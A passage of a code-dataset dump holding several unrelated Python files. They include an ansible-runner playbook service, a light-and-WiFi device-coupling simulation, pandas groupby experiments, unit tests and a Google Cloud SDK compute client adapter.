game.ACTIVE_COLOR\n points_msg = '+3 points'\n points_meaning = 'fast'\n elif condition == 'correct':\n base_color = game.ACTIVE_COLOR\n points_msg = '+1 point'\n points_meaning = 'correct'\n elif condition == 'slow':\n base_color = game.SLOW_COLOR\n points_msg = ' 0 points'\n points_meaning = 'slow'\n elif condition == 'incorrect':\n base_color = game.WRONG_COLOR\n points_msg = '-1 point'\n points_meaning = 'incorrect'\n r_color = base_color[0]-shade*(base_color[0]-game.BG_COLOR[0])\n g_color = base_color[1]-shade*(base_color[1]-game.BG_COLOR[0])\n b_color = base_color[2]-shade*(base_color[2]-game.BG_COLOR[0])\n fixation_color = (r_color,g_color,b_color)\n draw_tutorial_fixation(game, xpos=0, ypos=ypos, scale=scale, color=fixation_color)\n if condition == 'fast':\n draw_tutorial_fixation(game, xpos=scale*game.KEY_XPOS, ypos=ypos, scale=scale, color=fixation_color)\n draw_tutorial_fixation(game, xpos=-scale*game.KEY_XPOS, ypos=ypos, scale=scale, color=fixation_color)\n msg_shade = min(game.FIXATION_COLOR[0],int(game.FIXATION_COLOR[0]-(game.FIXATION_COLOR[0]-game.BG_COLOR[0])*shade))\n if points_bool:\n draw_msg(game.screen, points_msg, color=(msg_shade,msg_shade,msg_shade),\n loc='left',\n pos=(.675*game.SCREEN_WIDTH,\n .5*game.SCREEN_HEIGHT+ypos),\n size=35)\n draw_msg(game.screen, points_meaning, color=(msg_shade,msg_shade,msg_shade),\n loc='right',\n pos=(.325*game.SCREEN_WIDTH,\n .5*game.SCREEN_HEIGHT+ypos),\n size=35)\n\n\ndef draw_tutorial_fixation(game,xpos,ypos,scale,color):\n draw_msg(game.screen, '+', color=color,\n loc='center',\n pos=(.5*game.SCREEN_WIDTH+xpos,\n .5*game.SCREEN_HEIGHT+ypos+scale*game.FIXATION_OFFSET),\n size=int(scale*130))\n\n","sub_path":"game_graphics.py","file_name":"game_graphics.py","file_ext":"py","file_size_in_byte":11557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"272230376","text":"\nimport os\nimport glob\nimport json\nimport uuid\nimport threading\nimport time\n\nfrom ansible_runner import run_async\nfrom runner_service import configuration\nfrom .utils import fread\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef get_status(play_uuid):\n\n pb_artifacts = os.path.join(configuration.settings.playbooks_root_dir,\n \"artifacts\",\n play_uuid)\n\n if not os.path.exists(pb_artifacts):\n return None\n\n pb_status = os.path.join(pb_artifacts,\n 
\"status\")\n\n if os.path.exists(pb_status):\n return {\"status\": fread(pb_status)}\n else:\n # get last event\n events_dir = os.path.join(pb_artifacts, \"job_events\")\n events = os.listdir(events_dir)\n events.sort(key=lambda filenm: int(filenm.split(\"-\", 1)[0]))\n last_event = events[-1]\n last_event_data = json.loads(fread(os.path.join(events_dir,\n last_event)))\n print(last_event_data)\n return {\"status\": \"running\",\n \"task_id\": last_event_data.get('counter'),\n \"task_name\": last_event_data['event_data'].get('task')}\n\n\ndef list_playbooks():\n\n pb_dir = os.path.join(configuration.settings.playbooks_root_dir,\n \"project\")\n playbook_names = [os.path.basename(pb_path) for pb_path in\n glob.glob(os.path.join(pb_dir,\n \"*.yml\"))]\n\n return playbook_names\n\n\ndef stop_playbook(play_uuid):\n return\n\n\ndef start_playbook(playbook_name, vars):\n \"\"\" Initiate a playbook run \"\"\"\n\n play_uuid = str(uuid.uuid1())\n\n settings = {\"suppress_ansible_output\": True}\n\n # this should just be run_async, using 'run' hangs the root logger output\n # even when backgrounded\n if vars:\n _thread, _runner = run_async(private_data_dir=configuration.settings.playbooks_root_dir,\n settings=settings,\n # envvars=envvars,\n quiet=False,\n ident=play_uuid,\n extravars=vars,\n # inventory='localhost',\n playbook=playbook_name)\n else:\n _thread, _runner = run_async(private_data_dir=configuration.settings.playbooks_root_dir,\n settings=settings,\n # envvars=envvars,\n quiet=False,\n ident=play_uuid,\n # inventory='localhost',\n playbook=playbook_name)\n\n # Workaround for ansible_runner logging, resetting the rootlogger level\n root_logger = logging.getLogger()\n root_logger.setLevel(10)\n\n delay = 0.1\n timeout = 5 / delay\n ctr = 0\n\n # Wait for the play to actually start, but apply a timeout\n while _runner.status.lower() == 'unstarted':\n time.sleep(delay)\n ctr += 1\n if ctr > timeout:\n return play_uuid, \"timeout\"\n\n # Start a watcher, so the termination of the playbook can be recorded in\n # the log file\n _t = threading.Thread(target=watcher, args=(_thread, _runner))\n _t.daemon = True\n _t.name = \"watcher\"\n _t.start()\n\n return play_uuid, _runner.status\n\n\ndef watcher(pb_thread, pb_runner):\n \"\"\"\n Use a watcher thread to wait for a given playbook execution thread to\n terminate\n \"\"\"\n\n pb_thread.join()\n logger.info(\"Playbook {}, UUID={} ended, \"\n \"status={}\".format(pb_runner.config.playbook,\n pb_runner.config.ident,\n pb_runner.status))\n","sub_path":"runner_service/services/playbook.py","file_name":"playbook.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"60420462","text":"import os\nimport sys\n\n__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\nmodule_path = os.path.join(__location__, \"..\", \"..\", \"..\")\nsys.path.append(module_path)\n\nimport glob\nimport numpy\nimport logging\nfrom mock import MagicMock\nfrom itertools import cycle\nimport tsfresh.feature_extraction\nfrom twisted.internet import reactor\nfrom utils.serializer import DillSerializer\nfrom coupling.utils.misc import create_random_mac\nfrom coupling.utils.access_point import AccessPoint\nfrom coupling.utils.coupling_data import StaticCouplingResult\nimport coupling.light_grouping_pattern.light_analysis as light_analysis\nimport coupling.localization.localization_server as localization_server\nfrom 
coupling.device_grouping.online.machine_learning_features import Classifier\nfrom coupling.device_grouping.online.static.coupling_server import ServerController\nfrom coupling.device_grouping.online.static.coupling_client import ClientController\nfrom coupling.device_grouping.online.machine_learning_features import BasicFeatures\nfrom coupling.device_grouping.online.machine_learning_features import TsFreshFeatures\nimport coupling.device_grouping.online.coupling_static_simulator as coupling_simulator\nfrom coupling.device_grouping.online.static.coupling_data_provider import CouplingDataProvider\n\n# global data\nclients = list()\nmac_mapping = dict()\n\nclass SimulationData:\n \n def __init__(self, server_ip, server_port, num_clients, num_reject_clients, len_light_pattern,\n data_period_coupling, coupling_compare_method, coupling_similarity_threshold, equalize_method,\n data_period_ml_train, path_ml_train_data, coupling_ml_classifier,\n data_period_localization, localization_pos_in_area, path_wifi_scans, path_ble_scans, rounds=0):\n \n self.server_ip = server_ip\n self.server_port = int(server_port)\n self.num_clients = int(num_clients)\n self.num_reject_clients = int(num_reject_clients)\n self.len_light_pattern = int(len_light_pattern)\n self.light_signal, self.light_signal_time = light_analysis.load_light_pattern(self.len_light_pattern)\n \n self.data_period_coupling = float(data_period_coupling)\n self.str_coupling_compare_method = coupling_compare_method\n self.coupling_compare_method = coupling_simulator.coupling_compare_methods[self.str_coupling_compare_method]\n \n self.coupling_similarity_threshold = float(coupling_similarity_threshold)\n self.str_equalize_method = equalize_method\n self.equalize_method = coupling_simulator.equalize_methods[self.str_equalize_method]\n \n self.data_period_ml_train = float(data_period_ml_train)\n combined_raw_feature_data = glob.glob(os.path.join(path_ml_train_data, \"combined-*-raw-feature-data\"))[0]\n combined_raw_feature_data = DillSerializer(combined_raw_feature_data).deserialize()\n X_basic = combined_raw_feature_data[self.data_period_ml_train][rounds].X_basic\n y_basic = combined_raw_feature_data[self.data_period_ml_train][rounds].y_basic\n X_basic_all_features, X_basic_selected_features = self.process_ml_features(\n X_basic, y_basic, \"basic-features\", self.data_period_ml_train)\n assert len(X_basic_all_features) == len(y_basic)\n assert len(X_basic_selected_features) == len(y_basic)\n \n X_tsfresh = combined_raw_feature_data[self.data_period_ml_train][rounds].X_tsfresh\n y_tsfresh = combined_raw_feature_data[self.data_period_ml_train][rounds].y_tsfresh\n tsfresh_features_to_extract_selected = os.path.join(__location__, \"..\", \"tsfresh-features-to-be-extracted\")\n self.tsfresh_features_to_extract_selected = DillSerializer(tsfresh_features_to_extract_selected).deserialize()\n X_tsfresh_all_features, X_tsfresh_selected_features = self.process_ml_features(\n X_tsfresh, y_tsfresh, \"tsfresh-features\", self.data_period_ml_train, self.tsfresh_features_to_extract_selected)\n self.tsfresh_features_to_extract_all = tsfresh.feature_extraction.settings.from_columns(X_tsfresh_all_features)\n assert len(X_tsfresh_all_features) == len(y_tsfresh)\n assert len(X_tsfresh_selected_features) == len(y_tsfresh)\n \n self.str_coupling_ml_classifier = coupling_ml_classifier\n clf_type = coupling_simulator.coupling_ml_classifiers[self.str_coupling_ml_classifier]\n \n self.coupling_classifier_basic_all_features = Classifier.get_clf(clf_type)\n 
self.coupling_classifier_basic_all_features = self.coupling_classifier_basic_all_features.fit(\n X_basic_all_features, y_basic)\n self.coupling_classifier_basic_selected_features = Classifier.get_clf(clf_type)\n self.coupling_classifier_basic_selected_features = self.coupling_classifier_basic_selected_features.fit(\n X_basic_selected_features, y_basic)\n logging.info(\"basic all features shape: \" + str(X_basic_all_features.shape))\n logging.info(\"basic selected features shape: \" + str(X_basic_selected_features.shape))\n logging.info(\"truth shape: \" + str(y_basic.shape))\n \n self.coupling_classifier_tsfresh_all_features = Classifier.get_clf(clf_type)\n self.coupling_classifier_tsfresh_all_features = self.coupling_classifier_tsfresh_all_features.fit(\n X_tsfresh_all_features, y_tsfresh)\n self.coupling_classifier_tsfresh_selected_features = Classifier.get_clf(clf_type)\n self.coupling_classifier_tsfresh_selected_features = self.coupling_classifier_tsfresh_selected_features.fit(\n X_tsfresh_selected_features, y_tsfresh)\n logging.info(\"tsfresh all features shape: \" + str(X_tsfresh_all_features.shape))\n logging.info(\"tsfresh selected features shape: \" + str(X_tsfresh_selected_features.shape))\n logging.info(\"truth shape: \" + str(y_tsfresh.shape))\n \n self.data_period_localization = float(data_period_localization)\n self.localization_pos_in_area = map(int, localization_pos_in_area.strip('[]').split(','))\n self.wifi_scans = localization_server.load_data(path_wifi_scans)\n self.ble_scans = localization_server.load_data(path_ble_scans)\n self.path_wifi_scans = path_wifi_scans\n self.path_ble_scans = path_ble_scans\n self.localization_pos_out_area = [pos for pos in self.wifi_scans.keys() if pos not in self.localization_pos_in_area]\n \n def process_ml_features(self, X, y, filename, data_period_ml_train, tsfresh_features_to_extract_selected=None):\n logging.info(\"process ml features: \" + filename)\n data_exists = False\n file_exists = os.path.isfile(os.path.join(__location__, filename))\n if file_exists:\n X_features = DillSerializer(os.path.join(__location__, filename)).deserialize()\n if data_period_ml_train in X_features:\n X_all_features = X_features[data_period_ml_train][0]\n X_selected_features = X_features[data_period_ml_train][1]\n data_exists = True\n if not data_exists:\n if tsfresh_features_to_extract_selected:\n tsfresh_features = TsFreshFeatures()\n X_all_features = tsfresh_features.extract(X, y)\n X_selected_features = tsfresh_features.extract_selected_features(\n X, tsfresh_features_to_extract_selected)\n else:\n basic_features = BasicFeatures()\n X_all_features = basic_features.extract(X)\n X_selected_features = basic_features.extract_selected_features(X)\n if not file_exists:\n X_features = {data_period_ml_train: (X_all_features, X_selected_features)}\n else:\n X_features[data_period_ml_train] = (X_all_features, X_selected_features)\n DillSerializer(os.path.join(__location__, filename)).serialize(X_features)\n return X_all_features, X_selected_features\n\ndef evaluate_callback(accept_clients, reject_clients, runtime):\n accept_clients = list(accept_clients)\n reject_clients = list(reject_clients)\n groundtruth_accept_clients = [client.factory.get_mac() for client in clients if client.coupling_groundtruth]\n groundtruth_reject_clients = [client.factory.get_mac() for client in clients if not client.coupling_groundtruth]\n return StaticCouplingResult(accept_clients, reject_clients,\n groundtruth_accept_clients, groundtruth_reject_clients,\n runtime, mac_mapping)\n\ndef 
stop_reactor_callback():\n logging.info(\"stop reactor\")\n reactor.stop()\n \ndef get_mac(identifier):\n if identifier not in mac_mapping:\n mac_mapping[identifier] = create_random_mac()\n for client in clients:\n if client.factory.transport:\n remote = client.factory.transport.getHost()\n if identifier == remote.host or identifier == remote.port:\n client.factory.set_mac(mac_mapping[identifier])\n break\n return mac_mapping[identifier]\n\ndef run(parameter):\n access_point = AccessPoint()\n access_point.deny_hosts = MagicMock()\n access_point.get_mac = MagicMock(side_effect=get_mac)\n access_point.get_num_connected_clients = MagicMock(return_value=parameter.num_clients)\n localization_pos_in_iter = cycle(parameter.localization_pos_in_area)\n localization_pos_out_iter = cycle(parameter.localization_pos_out_area)\n \n for _ in range(parameter.num_clients-parameter.num_reject_clients): # accept client\n localization_pos_in = next(localization_pos_in_iter)\n coupling_data_provider = CouplingDataProvider(parameter.light_signal, parameter.light_signal_time,\n parameter.wifi_scans[localization_pos_in],\n parameter.ble_scans[localization_pos_in])\n clients.append(ClientController(parameter.server_ip, parameter.server_port,\n coupling_data_provider, True))\n \n datalen = len(parameter.light_signal)\n mean = parameter.light_signal.mean()\n std = parameter.light_signal.std()\n #light_signal_random, light_signal_random_time = light_analysis.load_random_light_signal()\n for _ in range(parameter.num_reject_clients): # reject client\n localization_pos_out = next(localization_pos_out_iter)\n light_signal_random = numpy.random.normal(mean, std, datalen)\n #coupling_data_provider = CouplingDataProvider(light_signal_random, light_signal_random_time,\n # parameter.wifi_scans[localization_pos_out], \n # parameter.ble_scans[localization_pos_out])\n coupling_data_provider = CouplingDataProvider(light_signal_random, parameter.light_signal_time,\n parameter.wifi_scans[localization_pos_out], \n parameter.ble_scans[localization_pos_out])\n clients.append(ClientController(parameter.server_ip, parameter.server_port,\n coupling_data_provider, False))\n \n server = ServerController(parameter.server_port, access_point,\n parameter.data_period_coupling, parameter.coupling_compare_method,\n parameter.coupling_similarity_threshold, parameter.equalize_method,\n parameter.data_period_localization, parameter.localization_pos_in_area,\n parameter.localization_pos_out_area, parameter.path_wifi_scans, parameter.path_ble_scans,\n parameter.coupling_classifier_basic_all_features,\n parameter.coupling_classifier_basic_selected_features,\n parameter.coupling_classifier_tsfresh_all_features,\n parameter.coupling_classifier_tsfresh_selected_features,\n parameter.tsfresh_features_to_extract_all, parameter.tsfresh_features_to_extract_selected,\n evaluate_callback, stop_reactor_callback)\n server.start()\n for client in clients:\n client.start()\n logging.info(\"run server and clients\")\n reactor.run()\n \ndef test():\n testbed = \"vm\" # server, vm\n server_ip = \"localhost\"\n server_port = 1026\n num_clients = 10\n num_reject_clients = 0\n len_light_pattern = 8\n data_period_coupling = 0.07\n coupling_compare_method = \"pearson\"\n coupling_similarity_threshold = 0.7\n equalize_method = \"dtw\"\n data_period_ml_train = 0.05\n coupling_ml_classifier = \"Random Forest\"\n path_ml_train_data = os.path.join(__location__, \"..\", \"ml-train-data\", testbed)\n data_period_localization = 5\n localization_pos_in_area = 
str(coupling_simulator.localization_pos_in_area)\n fingerprint_directory = os.path.join(__location__, \"..\", \"..\", \"localization\", \"data\")\n path_wifi_scans = os.path.join(fingerprint_directory, \"wifi-fingerprints\")\n path_ble_scans = os.path.join(fingerprint_directory, \"bluetooth-fingerprints\")\n parameter = SimulationData(server_ip, server_port,\n num_clients, num_reject_clients, len_light_pattern,\n data_period_coupling, coupling_compare_method, coupling_similarity_threshold, equalize_method,\n data_period_ml_train, path_ml_train_data, coupling_ml_classifier,\n data_period_localization, localization_pos_in_area, path_wifi_scans, path_ble_scans)\n run(parameter)\n \ndef evaluation():\n parameter = SimulationData(sys.argv[1], sys.argv[2], sys.argv[3],\n sys.argv[4], sys.argv[5], sys.argv[6],\n sys.argv[7], sys.argv[8], sys.argv[9],\n sys.argv[10], sys.argv[11], sys.argv[12],\n sys.argv[13], sys.argv[14], sys.argv[15],\n sys.argv[16])\n run(parameter)\n \nif __name__ == \"__main__\":\n logging.basicConfig(filename=\"static-coupling-simulation.log\", level=logging.DEBUG)\n #test()\n evaluation()\n ","sub_path":"device-association/device_grouping/online/static/coupling_simulation_round.py","file_name":"coupling_simulation_round.py","file_ext":"py","file_size_in_byte":14409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"131641091","text":"from terra_sdk.core.oracle import MsgAggregateExchangeRateVote, MsgDelegateFeedConsent\n\n\ndef test_deserializes_msg_delegate_feed_consent_examples(load_msg_examples):\n examples = load_msg_examples(\n MsgDelegateFeedConsent.type, \"./MsgDelegateFeedConsent.data.json\"\n )\n for example in examples:\n assert MsgDelegateFeedConsent.from_data(example).to_data() == example\n\n\ndef test_msg_aggregate_exchange_rate_vote_get_aggregate_vote_hash(load_msg_examples):\n msg = MsgAggregateExchangeRateVote(\n {\n \"ukrw\": \"245.000\",\n \"uusd\": \"0.2242\",\n \"usdr\": \"0.182\",\n },\n \"salt\",\n \"terra1krj7amhhagjnyg2tkkuh6l0550y733jnjulzjh\",\n \"terravaloper1krj7amhhagjnyg2tkkuh6l0550y733jnjnnlzy\",\n )\n\n assert (\n msg.get_aggregate_prevote().hash == \"7929908433e7399845fa60f9ef70ef7f2bb8f01b\"\n )\n","sub_path":"tests/core/oracle/msgs_test.py","file_name":"msgs_test.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"470622064","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 9 10:18:45 2017\n\nMostly from here:\nhttps://pandas.pydata.org/pandas-docs/stable/groupby.html\n\n\"\"\"\n\nimport pandas as pd\nimport math\nimport numpy as np\nimport timeit\n\ndef RMSEsubGroup(df):\n \n# print(len(df))\n \n# print(df['error'].apply(lambda x : x**2))\n\n \n# subRMSE = math.sqrt(((df['error'].apply(lambda x : x**2)).sum())/float(len(df)))\n subRMSE = np.sqrt(((df['error'].apply(lambda x : x**2)).sum())/float(len(df)))\n\n print('subRMSE : ', subRMSE )\n \n \ndef PandasGroupByExample():\n df = pd.read_csv('dummyshort.csv')\n \n print('df: ', df.head())\n \n \n grouped = df.groupby('UniqueClipID')\n \n print(grouped)\n print()\n print(grouped.groups)\n \n \n grouped.sum()\n \n print()\n \n # Iterate through groups \n for name, group in grouped:\n print('\\nGroup name: ', name)\n print('Group: ',group)\n # print(group['error'])\n RMSEsubGroup(group)\n \n return\n\n \ndef PandasGroupByExample_TwoStageGrouping():\n# df = pd.read_csv('dummyshort.csv')\n df = pd.read_csv('dummyshort2.csv')\n \n 
print('df: ', df.head())\n \n uniqProc = df['process_point'].unique()\n print('uniqProc : ', uniqProc )\n print('len(uniqProc) : ', len(uniqProc) )\n \n grouped = df.groupby(['UniqueClipID', 'process_point'])\n \n print('grouped: ', grouped)\n print()\n print('grouped.groups: ', grouped.groups)\n print('\\nKeys for grouped.groups: ', grouped.groups.keys())\n \n \n grouped.sum()\n \n print()\n \n # Iterate through groups \n for keys, group in grouped:\n print('\\nGroup keys: {} clipno: {} procPoint: {}'.format(keys, keys[0], keys[1]))\n# print('Group: ',group)\n # print(group['error'])\n RMSEsubGroup(group)\n\n # Same thing with enumerate \n for idx, (keys, group) in enumerate(grouped):\n print('\\nidx: {} Group keys: {} clipno: {} procPoint: {}'.format(idx, keys, keys[0], keys[1]))\n RMSEsubGroup(group) \n \n return\n\n\ndef PandasMergeTwoFilesExammple():\n \n df1 = pd.read_csv('bbox_all_avg.withGaugeClip.txt')\n print('df1.columns: ', df1.columns)\n \n df2 = pd.read_csv('uniqueClipRMSE.csv')\n print('df2.columns: ', df2.columns)\n \n# df3 = pd.concat([df1, df2])\n df3 = pd.merge(df1, df2, how='inner', on='UniqueClipID')\n \n print('df3.head=', df3.head())\n print('len(df1) = ', len(df1))\n print('len(df2) = ', len(df2))\n print('len(df3) = ', len(df3))\n\ndef TestGeneratorWithFileReading_NoGenerator():\n \n fin = open('bbox_all_avg.withGaugeClip.txt', 'r')\n lines = fin.readlines()\n fin.close()\n\n bbox = list()\n for line in lines: \n bbox.append(line)\n\n # TODO Instead of returning list, return \"generator\"\n return bbox \n \ndef TestGeneratorWithFileReading_WithGenerator():\n \n fin = open('bbox_all_avg.withGaugeClip.txt', 'r')\n lines = fin.readlines()\n fin.close()\n\n# bbox = list()\n for line in lines[1:]: \n# bbox.append(line)\n yield line\n # TODO Instead of returning list, return \"generator\"\n \ndef SpeedTestForGeneratorvsListReturns():\n \n bbox = TestGeneratorWithFileReading_NoGenerator()\n print('\\nlen(bbox): ', len(bbox))\n \n bbox1 = TestGeneratorWithFileReading_WithGenerator()\n print('\\nlen(bbox1): ', bbox1)\n \n \n print('With generator:', timeit.timeit(\"TestGeneratorWithFileReading_WithGenerator()\", setup=\"from __main__ import TestGeneratorWithFileReading_WithGenerator\"))\n# print('No generator:', timeit.timeit(\"TestGeneratorWithFileReading_NoGenerator()\", setup=\"from __main__ import TestGeneratorWithFileReading_NoGenerator\"))\n\n return \n \ndef PandasJoiningWthMultiIndex():\n \n dfmerged = pd.read_csv('debug.dfmerged.csv')\n dfunique = pd.read_csv('debug.intermediate.unique.csv')\n \n# dfunique = dfunique.set_index(['UniqueClipID', 'UniqueClipName'])\n \n dfunique = dfunique.set_index(['xmin', 'xmax', 'ymin', 'ymax', 'GAUGE', 'UniqueClipID',\n 'UniqueClipName', 'process_point', 'AutoModelRMSE', 'RefModelRMSE'])\n \n print('len(dfmerged)):', len(dfmerged))\n print('len(dfunique)):', len(dfunique))\n \n print('dfmerged: \\n', dfmerged.head(2)) \n print('\\ndfunique: \\n', dfunique.head(2)) \n \n# dfjoined = dfmerged.join(dfunique, lsuffix='_left', rsuffix='_right',\n# on=['UniqueClipID', 'UniqueClipName'])\n dfjoined = dfmerged.join(dfunique, lsuffix='_left', rsuffix='_right',\n on=['xmin', 'xmax', 'ymin', 'ymax', 'GAUGE', 'UniqueClipID',\n 'UniqueClipName', 'process_point', 'AutoModelRMSE', 'RefModelRMSE'])\n \n\n print('\\ndfjoined: \\n', dfjoined.head(2)) \n print('\\ndfjoined.columns: \\n', dfjoined.columns) \n print('len(dfjoined): \\n', len(dfjoined)) \n \n\ndef main():\n\n# PandasGroupByExample()\n \n# PandasGroupByExample_TwoStageGrouping()\n \n# 
PandasMergeTwoFilesExammple()\n \n# SpeedTestForGeneratorvsListReturns()\n\n PandasJoiningWthMultiIndex()\n \n \nif __name__ == '__main__':\n\n# print('No generator:', timeit.timeit(\"TestGeneratorWithFileReading_NoGenerator()\", setup=\"from __main__ import TestGeneratorWithFileReading_NoGenerator\")\n\n \n main()","sub_path":"misc/pandasgroupbytest.py","file_name":"pandasgroupbytest.py","file_ext":"py","file_size_in_byte":5322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"567023271","text":"import random\nimport string\n\nimport pytest\nimport exam\n\n# input string\n# output dict where key is int and value is list of symbols that appeared that many times in the string\n\n\ndef assert_solution(word):\n answer = exam.count_symbol_appearances_2(word)\n print(answer)\n symbol_set = set(word)\n quantity_list = []\n for symbol in symbol_set:\n quantity_list.append(word.count(symbol))\n if symbol not in answer[word.count(symbol)]: # if symbol is not where expected\n return False\n if len(answer.keys()) != len(set(quantity_list)): # if there are extra dictionary keys\n return False\n values = [item for sublist in list(answer.values()) for item in sublist]\n if len(values) != len(set(values)) or set(values) != symbol_set: # if there are repeat values or extra values\n return False\n return True\n\n\n@pytest.mark.timeout(1.0)\ndef test_count_symbol_appearances_2_01():\n # all different\n assert assert_solution(\"1\") # {1: [\"1\"]\n assert assert_solution(\"abc\") # {1: [\"a\", \"b\", \"c\"]}\n\n\n@pytest.mark.timeout(1.0)\ndef test_count_symbol_appearances_2_02():\n # all same\n assert assert_solution(\"1111\") # {4: [\"1\"]}\n assert assert_solution(\" \") # {6: [\" \"]}\n\n\n@pytest.mark.timeout(1.0)\ndef test_count_symbol_appearances_2_03():\n # various\n assert assert_solution(\"abba\") # {2: [\"a\", \"b\"]}\n assert assert_solution(\"AaAaAAAAa \") # {1: [\" \"], 3: [\"a\"], 6: [\"A\"]}\n\n\n@pytest.mark.timeout(1.0)\ndef test_count_symbol_appearances_2_04():\n # empty string\n assert assert_solution(\"\") # {}\n\n\n@pytest.mark.timeout(5.0)\ndef test_count_symbol_appearances_2_05():\n # random\n for _ in range(100):\n assert assert_solution(\"\".join(random.choices(string.ascii_letters, k=random.randint(0, 100))))\n","sub_path":"week-3/test_count_symbol_appearances_2.py","file_name":"test_count_symbol_appearances_2.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"229019017","text":"# Copyright (c) 2013 Mirantis Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nimport sys\n\nfrom git_review import tests\nfrom git_review.tests import utils\n\n\ndef list_test_ids(argv):\n res = utils.run_cmd(sys.executable, '-m', 'testtools.run', *argv[1:])\n return res.split('\\n')\n\n\ndef find_collisions(test_ids):\n hashes = {}\n for test_id in test_ids:\n hash_ = tests._hash_test_id(test_id)\n if 
hash_ in hashes:\n return (hashes[hash_], test_id)\n hashes[hash_] = test_id\n return None\n\n\ndef main(argv):\n test_ids = list_test_ids(argv)\n if not test_ids:\n print(\"No tests found, check command line arguments\", file=sys.stderr)\n return 1\n collision = find_collisions(test_ids)\n if collision is None:\n return 0\n print(\n \"Found a collision for test ids hash function: %s and %s\\n\"\n \"You should change _hash_test_id function in\"\n \" git_review/tests/__init__.py module to fit new set of test ids.\"\n % collision,\n file=sys.stderr,\n )\n return 2\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","sub_path":"git_review/tests/check_test_id_hashes.py","file_name":"check_test_id_hashes.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"235874041","text":"# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Backend service.\"\"\"\n\nimport urlparse\n\nfrom googlecloudsdk.api_lib.compute import request_helper\nfrom googlecloudsdk.api_lib.compute import utils\nfrom googlecloudsdk.core import apis as core_apis\n\n\ndef GetBatchUrl(endpoint_url):\n \"\"\"Return a batch URL for the given endpoint URL.\"\"\"\n parsed_endpoint = urlparse.urlparse(endpoint_url)\n return urlparse.urljoin(\n '{0}://{1}'.format(parsed_endpoint.scheme, parsed_endpoint.netloc),\n 'batch')\n\n\nclass ClientAdapter(object):\n \"\"\"Encapsulates compute apitools interactions.\"\"\"\n _API_NAME = 'compute'\n\n def __init__(self, api_default_version='v1'):\n self._api_version = core_apis.ResolveVersion(\n self._API_NAME, api_default_version)\n self._client = core_apis.GetClientInstance(\n self._API_NAME, self._api_version)\n\n # Turn the endpoint into just the host.\n # eg. 
https://www.googleapis.com/compute/v1 -> https://www.googleapis.com\n endpoint_url = core_apis.GetEffectiveApiEndpoint(\n self._API_NAME, self._api_version)\n self._batch_url = GetBatchUrl(endpoint_url)\n\n @property\n def api_version(self):\n return self._api_version\n\n @property\n def apitools_client(self):\n return self._client\n\n @property\n def batch_url(self):\n return self._batch_url\n\n @property\n def messages(self):\n return self._client.MESSAGES_MODULE\n\n def MakeRequests(self, requests, errors_to_collect=None):\n \"\"\"Sends given request in batch mode.\"\"\"\n errors = errors_to_collect if errors_to_collect is not None else []\n objects = list(request_helper.MakeRequests(\n requests=requests,\n http=self._client.http,\n batch_url=self._batch_url,\n errors=errors,\n custom_get_requests=None))\n if errors_to_collect is None and errors:\n utils.RaiseToolException(\n errors, error_message='Could not fetch resource:')\n return objects\n\n","sub_path":"files/usr/google-cloud-sdk/lib/googlecloudsdk/api_lib/compute/client_adapter.py","file_name":"client_adapter.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"63630262","text":"import os\nimport pygame\nfrom map_creator import *\nfrom constant import *\nfrom pygame.locals import *\n\ndef main():\n pygame.init()\n window = pygame.display.set_mode((WIDTH, HEIGHT), RESIZABLE)\n init_map(window)\n end_program = False\n while end_program == False:\n for event in pygame.event.get():\n pygame.display.flip()\n if event.type == QUIT:\n end_program = True\n return (0)\n\nmain();\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"179252919","text":"import unittest\nfrom ..utils.getters import with_getters_for\n\nclass TestWithGettersFor(unittest.TestCase):\n def test_should_add_getters_to_the_given_class_for_the_given_var_names(self):\n class MyClass(object):\n def __init__(self, foo, bar):\n self.foo = foo\n self.bar = bar\n with_getters_for(MyClass, 'foo', 'bar')\n \n foo = 'foo_var'\n bar = 'bar_var'\n\n clazz = MyClass(foo, bar)\n self.assertEquals(foo, clazz.get_foo(), \"Should have a getter for foo\")\n self.assertEquals(bar, clazz.get_bar(), \"Should have a getter for bar\")\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"assignment2/src/photogallery/tests/getters_test.py","file_name":"getters_test.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} 